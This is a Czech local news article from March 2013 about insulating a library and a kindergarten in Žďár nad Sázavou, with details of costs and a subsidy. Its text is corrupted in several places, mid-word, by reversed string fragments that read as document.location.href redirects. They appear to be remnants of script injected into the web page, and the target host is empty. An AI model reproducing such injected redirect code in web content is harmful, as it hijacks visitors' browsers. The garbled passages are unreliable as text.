Žďár nad Sázavou, zdar nad sazavou, aktuality, knihovna, školka, zateplení
Rainbow page separator

Žďárští zateplí knihovnu a školku

Pondělí, 18. března 2013

090713-zd-cmyk-skolka-zdar-zr12-0907_denik-380Žďár nad Sázavou / Zateplení le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos čeká žďárskou Knihovnu Matěje Josefa Sychry a mateřskou školku ve Veselské ulici. Náklady na obě stavební akce mají činit zhruba 10,5 milionu korun, žďárské radnici by s financováním měla výrazně pomoci dotace z programu Zelená úsporám, o kterou podali žádost už v roce 2010. „Rozhodnutí o získání dotace máme obdržet do konce [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to měsíce,“ poznamenala žďárská starostka Dagmar Zvěřinová. Přiznaná dotace by měla činit 6,2 milionu korun.

Jak u školky, tak u knihovny dojde k zateplení obvodového pláště a provedení izolace proti vodě. V mateřské školce se budou měnit okna, na knihovně zase stavbaři opraví střechu. Vlivem zateplení budov by rovněž mělo dojít ke snížení nákladů na vytápění obou objektů.

V létě se uskuteční i rekonstrukce před vstupem do knihovny – opravena bude poškozená dlažba a mezidveřní pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory u hlavního vchodu. Veškeré stavební práce mají být ukončeny do září.